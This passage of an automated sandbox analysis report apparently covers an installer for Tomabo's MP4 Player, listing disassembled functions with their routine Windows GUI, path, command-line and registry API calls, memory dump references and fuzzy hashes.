                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,FFFFFFFF,(:D,00000000,?,004765CB,(:D,?,00000080,00000000,?,?,FFFFFFFF), ref: 004814D0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: (:D$T$X$t$z
                                                                                                                                                                                                  • API String ID: 1659193697-2820635847
                                                                                                                                                                                                  • Opcode ID: 41dfabbf99ea7b7df54dbfb2317eba7605a4200135940f62b1bafd17f83dd4d7
                                                                                                                                                                                                  • Instruction ID: 8c2c7358f666f417834f7ab87c6fa977113941ad10054ca79f27a75166bac67f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41dfabbf99ea7b7df54dbfb2317eba7605a4200135940f62b1bafd17f83dd4d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF31C3715082406FD300EA59DC81DAFBBDCEFC6318F84495EF58842212D67DAA0A87B7
                                                                                                                                                                                                  Function 00411A40 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00411A45
                                                                                                                                                                                                    • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00411A65
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00411A6E
                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00411AA5
                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00411AD3
                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00411AE7
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A40), ref: 004B97EF
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A48), ref: 004B97F8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClientScreenWindow$ExtentH_prologLongParentPoint32RectReleaseText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 571962570-0
                                                                                                                                                                                                  • Opcode ID: 4278cbf124fea2933a985958ee123705f27499e53cabb05641bcc78802bd9f8a
                                                                                                                                                                                                  • Instruction ID: 8d2c89178239ad370fc5376dfc587a43112afcfc56ae6882a07636a5d3a6d81d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4278cbf124fea2933a985958ee123705f27499e53cabb05641bcc78802bd9f8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC311C71A00205AFDB04EFA5DD45EEEBBB9FF48314F044529F605932A1DB39AD41CB64
                                                                                                                                                                                                  Function 0041D32D Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041D332
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,0041F1F1,?,?,%s\%s\%s,?,Tomabo,MP4 Player,00508FBC), ref: 0041D33C
                                                                                                                                                                                                  • PathIsRootW.SHLWAPI(?,?,?,0041F1F1,?,?,%s\%s\%s,?,Tomabo,MP4 Player,00508FBC), ref: 0041D351
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Path$ExistsFileH_prologRoot
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2517856918-0
                                                                                                                                                                                                  • Opcode ID: 8f2ebb83ced8e5a72120ef0e4fd53c8888b9c5bdda017bc3262ff7e8bdff0888
                                                                                                                                                                                                  • Instruction ID: 562aaeb64256f8b58e6f634ff36a17b245561aa8b8edc4af6ed6ded62593b218
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2ebb83ced8e5a72120ef0e4fd53c8888b9c5bdda017bc3262ff7e8bdff0888
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD21B331900129ABDB24ABA1DC45FEE7B34EF00365F10062AF822B70E0DB785D45CA99
                                                                                                                                                                                                  Function 00411554 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetBkMode.GDI32(?), ref: 0041156F
                                                                                                                                                                                                  • GetBkColor.GDI32(?), ref: 0041157B
                                                                                                                                                                                                  • GetTextColor.GDI32(?), ref: 00411587
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00411593
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004115A8
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A40), ref: 004B97EF
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A48), ref: 004B97F8
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9641
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9655
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 004115D4
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B9471
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B947F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ModeWindow$ClientColorScreen$MessageParentRectSendText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3864841213-0
                                                                                                                                                                                                  • Opcode ID: dc61acec43b64f84df1aefe5db42c46c2f628a9465cc6c38a379d504f22bcd26
                                                                                                                                                                                                  • Instruction ID: 4821f5afca3dfb1e93660dbd529fb6b1244d812143ae10136e2be1d90f711484
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc61acec43b64f84df1aefe5db42c46c2f628a9465cc6c38a379d504f22bcd26
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F211975A00219EFCF01AFA1CC48CDEBFB9FF08314B14442AFA45A2261CB35A961DF64
                                                                                                                                                                                                  Function 00411B2E Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetBkMode.GDI32(?), ref: 00411B49
                                                                                                                                                                                                  • GetBkColor.GDI32(?), ref: 00411B55
                                                                                                                                                                                                  • GetTextColor.GDI32(?), ref: 00411B61
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00411B6D
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00411B82
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A40), ref: 004B97EF
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A48), ref: 004B97F8
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9641
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9655
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 00411BAE
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B9471
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B947F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ModeWindow$ClientColorScreen$MessageParentRectSendText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3864841213-0
                                                                                                                                                                                                  • Opcode ID: 0bde473ff6e71d5d3702c2eb7c410b298ffa728bfeb746d1e2242625aa7ecf2e
                                                                                                                                                                                                  • Instruction ID: 090d479fc239463ad8ce79f623068e6c68db2b3612f4c561218a0c3d7ebabef7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bde473ff6e71d5d3702c2eb7c410b298ffa728bfeb746d1e2242625aa7ecf2e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63210A75A00219EFCF019FA1CC48CDDBBB9FF08314B14442AFA45A6261DB35A961DB64
                                                                                                                                                                                                  Function 004BC729 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(00000001), ref: 004BC75C
                                                                                                                                                                                                  • GetLastActivePopup.USER32(00000001), ref: 004BC76B
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000001), ref: 004BC780
                                                                                                                                                                                                  • EnableWindow.USER32(00000001,00000000), ref: 004BC793
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000001,000000F0), ref: 004BC7A5
                                                                                                                                                                                                  • GetParent.USER32(00000001), ref: 004BC7B3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 670545878-0
                                                                                                                                                                                                  • Opcode ID: cd665a56acac859c81cad6e84494ce98bdbd6ba8941d31be9124adf495a38751
                                                                                                                                                                                                  • Instruction ID: 0e96f466775b7451a6b1b12101c63da0fe18ddbb2021faaaeb5ea3899b6651dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd665a56acac859c81cad6e84494ce98bdbd6ba8941d31be9124adf495a38751
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E611A07260132357D6716A6A8CC4BABB3A89F55B52F15012BED10D7300DF68CC014AFD
                                                                                                                                                                                                  Function 0049C625 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(?,00000000,?,?,00496849), ref: 0049C63E
                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(?,00000000,?,?,00496849), ref: 0049C650
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(?,00000000,?,?,00496849), ref: 0049C667
                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(?,00000000,?,?,00496849), ref: 0049C670
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,00496849), ref: 0049C689
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,00496849), ref: 0049C6AE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CommandLine$ByteCharMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3068183746-0
                                                                                                                                                                                                  • Opcode ID: 7e5e3954b1a23d64f22b34a945b44c96c98b1c7b1266085b3eb3063c29e2df61
                                                                                                                                                                                                  • Instruction ID: 93f2e3e93b36880fd0f7827b03c5a9eea13c13eec9e3aa53fdf44c6a780e223b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e5e3954b1a23d64f22b34a945b44c96c98b1c7b1266085b3eb3063c29e2df61
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 821108722082156AFF2057A59DC0F273F8CDBD1764F25113BF400D63E4DB59DC015AA9
                                                                                                                                                                                                  Function 004C0C11 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004C0C1A
                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 004C0C27
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004C0C5C
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 004C0C78
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 004C0C90
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004C0C99
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Show$DesktopLong
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3178490500-0
                                                                                                                                                                                                  • Opcode ID: 430f962a90fcccd45457f94de6ce1071c6e0d6d59ad9a3ada8bd92c95080c717
                                                                                                                                                                                                  • Instruction ID: 24bc8152cec834558d1c4014925b01b6f9a9112cddf2dfad6deee1ecd03e4ccc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430f962a90fcccd45457f94de6ce1071c6e0d6d59ad9a3ada8bd92c95080c717
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86110475902B15EBD2B59E25CE49F5F769C9F517A1F21032EF514922C0DB2CD80081AD
                                                                                                                                                                                                  Function 004BC38F Relevance: 9.1, APIs: 6, Instructions: 59registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 004BC3B3
                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,?), ref: 004BC3D3
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004BC408
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegOpenKeyExW.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4CB6
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CD9
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CF8
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCloseKey.KERNEL32(?,?,?,00508FBC,AppFolder,00000000), ref: 004C4D08
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCloseKey.ADVAPI32(00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4D12
                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004BC426
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1886894508-0
                                                                                                                                                                                                  • Opcode ID: 67c1fa23525100f4d85c5587259d81082c873f270b0765e93623b6251f2916be
                                                                                                                                                                                                  • Instruction ID: 129871d5cc2e96d6dd688fdf12bbee243eb27439d6e993f68968dc8034574302
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67c1fa23525100f4d85c5587259d81082c873f270b0765e93623b6251f2916be
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A116036001525EBCF221F61CC98FEE3BA5EF04754F158426FD159A121C779C9229BAD
                                                                                                                                                                                                  Function 0040C5EF Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
                                                                                                                                                                                                  • LoadIconW.USER32(?,000000C8), ref: 0040C632
                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,00000000), ref: 0040C642
                                                                                                                                                                                                  • LoadIconW.USER32(?,000000C9), ref: 0040C652
                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000), ref: 0040C65C
                                                                                                                                                                                                  • LoadIconW.USER32(?,000000CA), ref: 0040C66C
                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000), ref: 0040C676
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Icon$ImageList_$LoadReplace$Create
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1174600510-0
